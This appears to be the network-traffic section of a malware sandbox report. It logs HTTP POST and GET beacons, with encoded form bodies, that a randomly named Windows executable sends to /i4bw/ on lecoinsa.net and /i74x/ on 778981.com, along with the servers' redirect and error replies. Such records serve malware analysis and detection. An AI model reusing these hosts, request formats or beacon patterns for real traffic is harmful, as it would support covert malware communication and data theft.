                  Data Raw: 79 6c 54 38 65 6c 3d 4d 45 61 4a 58 4d 58 56 4a 6e 56 51 64 4c 34 6b 76 54 38 66 77 4c 4e 6d 6e 72 2b 30 2f 6f 70 48 53 75 4f 7a 69 4b 61 55 30 6e 71 78 73 63 46 2f 76 43 6b 70 62 44 6f 61 39 4a 65 68 7a 4f 78 31 50 41 53 4c 70 35 64 64 51 74 53 70 62 78 74 54 59 61 63 4e 4f 41 50 53 4d 49 67 77 47 5a 56 2f 45 4f 4b 43 43 30 70 69 4a 65 44 33 63 76 2f 39 57 5a 32 32 63 4a 6b 51 63 38 79 2b 73 44 31 72 43 63 4d 43 45 77 6d 2f 52 36 67 56 31 53 57 44 59 58 74 48 51 6c 48 72 4e 39 6d 73 38 42 71 59 66 6d 4a 57 36 57 35 53 48 41 72 55 7a 36 79 79 68 77 7a 35 51 52 74 61 32 6f 2b 6c 33 4e 45 38 4c 41 3d 3d
                  Data Ascii: ylT8el=MEaJXMXVJnVQdL4kvT8fwLNmnr+0/opHSuOziKaU0nqxscF/vCkpbDoa9JehzOx1PASLp5ddQtSpbxtTYacNOAPSMIgwGZV/EOKCC0piJeD3cv/9WZ22cJkQc8y+sD1rCcMCEwm/R6gV1SWDYXtHQlHrN9ms8BqYfmJW6W5SHArUz6yyhwz5QRta2o+l3NE8LA==
                  Jul 3, 2024 10:52:49.065510988 CEST572INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:48 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.1149737217.116.0.191801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:51.500430107 CEST692OUTPOST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 4d 45 61 4a 58 4d 58 56 4a 6e 56 51 63 72 49 6b 74 30 6f 66 6e 37 4e 6c 73 4c 2b 30 6c 59 70 62 53 75 4b 7a 69 4f 4b 2b 33 52 61 78 69 65 4e 2f 75 47 51 70 57 6a 6f 61 31 70 65 39 75 65 78 75 50 41 58 38 70 38 6c 64 51 74 47 70 62 30 52 54 5a 73 55 4b 4f 51 50 51 42 6f 67 49 4a 35 56 2f 45 4f 4b 43 43 30 4e 59 4a 65 4c 33 64 66 76 39 5a 63 61 70 56 70 6b 58 5a 4d 79 2b 6e 6a 31 76 43 63 4d 67 45 78 4c 69 52 2f 73 56 31 51 65 44 66 46 46 41 62 6c 48 74 4a 39 6e 72 39 42 6e 55 61 6e 30 68 36 58 35 49 51 41 61 70 32 38 6a 6f 78 54 36 75 54 43 6c 59 69 4f 66 56 2b 38 68 31 51 48 6a 42 64 44 43 7a 2f 4f 43 46 61 36 2f 33 47 45 5a 68 4a 32 6b 3d
                  Data Ascii: ylT8el=MEaJXMXVJnVQcrIkt0ofn7NlsL+0lYpbSuKziOK+3RaxieN/uGQpWjoa1pe9uexuPAX8p8ldQtGpb0RTZsUKOQPQBogIJ5V/EOKCC0NYJeL3dfv9ZcapVpkXZMy+nj1vCcMgExLiR/sV1QeDfFFAblHtJ9nr9BnUan0h6X5IQAap28joxT6uTClYiOfV+8h1QHjBdDCz/OCFa6/3GEZhJ2k=
                  Jul 3, 2024 10:52:52.208338976 CEST572INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:52 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.1149738217.116.0.191801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:54.053241968 CEST1705OUTPOST /i4bw/ HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lecoinsa.net
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lecoinsa.net/i4bw/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 4d 45 61 4a 58 4d 58 56 4a 6e 56 51 63 72 49 6b 74 30 6f 66 6e 37 4e 6c 73 4c 2b 30 6c 59 70 62 53 75 4b 7a 69 4f 4b 2b 33 53 36 78 69 73 31 2f 73 68 4d 70 58 6a 6f 61 71 5a 65 2b 75 65 77 30 50 41 76 77 70 38 67 71 51 76 2b 70 61 57 4a 54 4d 75 38 4b 45 51 50 51 49 49 67 7a 47 5a 55 37 45 4f 36 4f 43 30 64 59 4a 65 4c 33 64 64 6e 39 51 70 32 70 5a 4a 6b 51 63 38 79 79 73 44 31 58 43 63 46 66 45 78 50 79 52 4c 51 56 32 7a 32 44 64 32 74 41 53 6c 48 76 45 64 6e 4a 39 42 71 57 61 6b 51 58 36 58 4e 78 51 43 36 70 33 62 53 75 75 51 43 43 45 69 68 77 32 50 58 47 33 5a 4a 47 65 32 76 59 55 52 61 6d 71 72 71 75 52 66 61 6f 58 52 41 68 52 54 67 4e 38 64 61 5a 68 38 68 58 4f 47 56 31 36 69 46 58 68 62 64 58 77 42 6a 64 56 41 31 68 49 74 4c 56 47 4b 6d 61 36 7a 4f 4e 51 75 53 68 35 78 76 66 4e 59 6e 53 72 59 55 70 45 41 2b 74 54 46 51 75 58 71 31 46 57 47 47 4c 6e 71 62 31 6b 2f 56 30 31 65 4d 57 4e 6e 78 49 2b 45 45 59 76 33 35 4f 64 63 6a 77 69 70 36 5a 78 7a 4b 71 34 5a 76 6b 55 57 54 [TRUNCATED]
                  Data Ascii: ylT8el=MEaJXMXVJnVQcrIkt0ofn7NlsL+0lYpbSuKziOK+3S6xis1/shMpXjoaqZe+uew0PAvwp8gqQv+paWJTMu8KEQPQIIgzGZU7EO6OC0dYJeL3ddn9Qp2pZJkQc8yysD1XCcFfExPyRLQV2z2Dd2tASlHvEdnJ9BqWakQX6XNxQC6p3bSuuQCCEihw2PXG3ZJGe2vYURamqrquRfaoXRAhRTgN8daZh8hXOGV16iFXhbdXwBjdVA1hItLVGKma6zONQuSh5xvfNYnSrYUpEA+tTFQuXq1FWGGLnqb1k/V01eMWNnxI+EEYv35Odcjwip6ZxzKq4ZvkUWTKeqTlYLwjscQliI0B9ovKhtjtqy4af6npgniTJw/1sda1hWzwHWYTfSMo4K4M+QBSejk6ojXbDtmLaLTFkAzKmRKCajvRlHtvnlEKiaKO/Ark6OhVFSkTO2Kp0HpptaSeNV3U+DLX3NcrncoGy/fa5mwxWbRgCNFvm2kQgf8bRLxPJbDawA1lWOM3NnZ3HtuhBSxwHHX9P6/+HAqHNDiHzXe1pm4b5IBcmCsFRpnttcTRrU2bgCkk5OFhyeyUG+XzQfMwocnIugyKABKcynCThLNZtmRPtgqje/T4pKY0qv/qHBuYCBvunJIqK1VB5pAXwpO5fCQoLNqZOMxVuzWC0S8jzxz/3bla2kv+mWNC/oX7xJH0ittAj9o8vat8S0rkZ3n9u0XgweSb3vIumV9pMRFF8i4FO90kPgAfSC5qb5q2VGqasxqtZXQ7CV0biMPVUoR3f5NlOhJL/WIDcJekGTiHmEjKSxlEyYZeNGKrHAAItuCVNXzDiw7th2ADdubtoXqU7Q0xkIxlO9KicJzLcZD8/tQLjQKZ6hPNXIj2Uj1FvSn+cck3yvH1oi1So/JHRT+xntsqkQpANkHUlr2TxlsY7w62Lo1vbr+M+6jZO+J0crokSOaMdN/pkdhUAdNNic9QhJlEAKWakH5vOLJ3MM7VKFsaEHVHS [TRUNCATED]
                  Jul 3, 2024 10:52:54.739522934 CEST572INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.1149739217.116.0.191801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:56.584433079 CEST411OUTGET /i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM= HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:57.292973995 CEST1236INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:57 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 934
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=
                  Age: 0
                  X-Cache: MISS
                  X-BKSrc: 0.6
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 69 34 62 77 2f 3f 51 62 39 34 3d 37 76 57 54 69 66 6a 78 55 26 61 6d 70 3b 79 6c 54 38 65 6c 3d 42 47 79 70 55 36 6a 43 46 77 68 46 56 34 34 45 73 52 74 33 76 4a 30 5a 6b 4c 7a 67 68 37 63 47 52 36 61 4a 72 59 4b 56 34 58 65 49 75 66 51 45 6e 32 77 74 66 58 4d 56 36 4e 48 38 2f 4f 46 36 59 48 57 41 6c 71 45 45 52 38 47 6e 54 58 35 64 57 4d 41 68 53 41 37 66 52 2b 59 37 44 35 45 6b 47 72 48 4c 54 32 35 62 41 75 7a 58 66 2b 72 52 4e 75 36 6b 63 4a 4d 3d 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM='" /> <title>Redirecting to http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=">http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8
                  Jul 3, 2024 10:52:57.293029070 CEST85INData Raw: 2f 4f 46 36 59 48 57 41 6c 71 45 45 52 38 47 6e 54 58 35 64 57 4d 41 68 53 41 37 66 52 2b 59 37 44 35 45 6b 47 72 48 4c 54 32 35 62 41 75 7a 58 66 2b 72 52 4e 75 36 6b 63 4a 4d 3d 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74
                  Data Ascii: /OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=</a>. </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.1149740165.154.0.120801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:02.553823948 CEST666OUTPOST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6d 45 59 51 2b 4c 42 6b 43 74 36 6e 43 6d 6a 38 6a 39 38 41 7a 47 7a 73 51 30 36 4d 63 47 61 54 67 58 4c 38 56 45 51 32 71 67 72 36 5a 55 53 59 2b 65 35 35 4a 48 37 35 4f 70 4a 4d 37 4e 73 54 7a 49 71 45 44 59 72 51 48 7a 6f 54 2f 31 36 71 6b 42 35 74 41 6c 62 36 76 52 33 38 49 52 36 35 4d 68 56 75 46 51 6d 54 6d 42 79 75 46 4f 6d 68 68 6f 39 63 45 6c 42 6d 6a 38 7a 63 41 74 56 50 57 45 68 6f 42 42 42 67 68 34 4c 57 30 62 4e 30 57 46 64 52 44 4d 4f 70 73 6b 33 2b 7a 47 4d 78 64 61 57 38 75 4b 38 48 41 36 55 47 4f 39 70 71 32 68 6f 69 37 37 6b 4b 2b 51 54 56 43 30 56 6d 56 77 3d 3d
                  Data Ascii: ylT8el=mEYQ+LBkCt6nCmj8j98AzGzsQ06McGaTgXL8VEQ2qgr6ZUSY+e55JH75OpJM7NsTzIqEDYrQHzoT/16qkB5tAlb6vR38IR65MhVuFQmTmByuFOmhho9cElBmj8zcAtVPWEhoBBBgh4LW0bN0WFdRDMOpsk3+zGMxdaW8uK8HA6UGO9pq2hoi77kK+QTVC0VmVw==
                  Jul 3, 2024 10:53:03.451106071 CEST309INHTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:03 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 78 30 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx04</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.1149741165.154.0.120801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:05.088560104 CEST686OUTPOST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6d 45 59 51 2b 4c 42 6b 43 74 36 6e 43 48 7a 38 67 63 38 41 69 32 7a 6a 65 55 36 4d 53 6d 61 70 67 58 33 38 56 47 38 6d 71 79 66 36 61 32 61 59 39 66 35 35 49 48 37 35 61 35 4a 44 6d 64 73 59 7a 49 6d 79 44 64 4c 51 48 7a 38 54 2f 77 57 71 6b 77 35 71 52 6c 62 34 30 68 33 2b 4d 52 36 35 4d 68 56 75 46 51 44 34 6d 42 4b 75 47 2b 32 68 67 4a 39 54 4e 46 42 68 71 63 7a 63 45 74 56 4c 57 45 68 4b 42 44 31 4b 68 37 2f 57 30 62 64 30 57 30 64 57 4b 4d 4f 72 79 55 32 31 32 6d 56 55 65 6f 7a 69 6c 4d 78 31 50 4c 67 46 50 37 34 77 6d 43 68 31 34 6f 73 49 71 32 79 6c 4c 46 77 76 4f 33 59 4c 57 71 6d 62 78 6c 6f 71 43 32 56 2b 68 35 55 34 4f 4d 45 3d
                  Data Ascii: ylT8el=mEYQ+LBkCt6nCHz8gc8Ai2zjeU6MSmapgX38VG8mqyf6a2aY9f55IH75a5JDmdsYzImyDdLQHz8T/wWqkw5qRlb40h3+MR65MhVuFQD4mBKuG+2hgJ9TNFBhqczcEtVLWEhKBD1Kh7/W0bd0W0dWKMOryU212mVUeozilMx1PLgFP74wmCh14osIq2ylLFwvO3YLWqmbxloqC2V+h5U4OME=
                  Jul 3, 2024 10:53:05.969374895 CEST309INHTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:05 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 78 30 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx04</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.1149742165.154.0.120801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:07.618547916 CEST1699OUTPOST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6d 45 59 51 2b 4c 42 6b 43 74 36 6e 43 48 7a 38 67 63 38 41 69 32 7a 6a 65 55 36 4d 53 6d 61 70 67 58 33 38 56 47 38 6d 71 79 6e 36 61 44 4f 59 2f 38 42 35 4f 33 37 35 5a 35 49 45 6d 64 73 46 7a 49 50 37 44 64 47 72 48 78 45 54 2f 53 65 71 69 44 68 71 49 31 62 34 38 42 33 39 49 52 37 37 4d 68 6c 79 46 51 54 34 6d 42 4b 75 47 34 79 68 77 6f 39 54 42 6c 42 6d 6a 38 7a 59 41 74 56 7a 57 45 35 77 42 44 78 77 69 4e 50 57 30 37 74 30 46 6d 31 57 42 4d 4f 74 7a 55 32 6d 32 6d 70 48 65 6f 66 6d 6c 4d 73 67 50 4c 49 46 4d 4e 59 6e 37 69 70 6f 69 59 73 4b 30 30 4f 4a 52 48 51 64 48 77 6f 4c 47 70 57 64 72 68 4d 57 42 6b 59 74 32 34 30 65 63 59 32 45 7a 6d 77 51 6b 4a 48 59 33 70 68 43 4d 49 51 6a 53 66 70 43 59 53 57 52 2f 53 67 63 48 2f 4a 44 4e 58 34 50 2f 75 59 39 65 6f 42 31 32 32 6e 4c 41 5a 43 79 46 42 48 65 4f 77 41 44 57 68 64 5a 4e 57 5a 5a 76 2f 35 4b 6a 69 73 78 33 75 52 59 44 79 6f 43 46 64 35 31 42 73 62 53 41 77 57 31 38 63 44 4b 75 79 73 48 78 70 4e 50 64 33 39 4f 67 47 4c [TRUNCATED]
